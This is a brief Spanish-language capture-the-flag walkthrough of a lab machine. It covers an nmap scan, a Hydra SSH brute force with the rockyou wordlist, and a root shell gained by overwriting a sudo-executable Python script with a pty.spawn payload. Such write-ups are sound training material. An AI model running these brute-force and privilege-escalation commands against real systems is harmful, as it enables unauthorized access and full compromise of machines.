NMAP

Resultado de escaneo NMAP

WEB

Interfaz Web Inicial

Fuerza Bruta

Usando Hydra para fuerza bruta en SSH:

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.146.26 -t4
Resultado de Fuerza Bruta con Hydra

SSH

Conexión SSH Establecida

Flag Usuario

Comando utilizado para visualizar la bandera:

cat user.txt
Archivo de Bandera de Usuario

Escalada de Privilegios

Verificación de permisos con:

sudo -l
Permisos Sudo

Creación y ejecución de un script para obtener una shell:

rm -f bak.py
echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py
sudo python /home/meliodas/bak.py
Escalada de Privilegios con Python

Flag Root

Archivo de Bandera de Root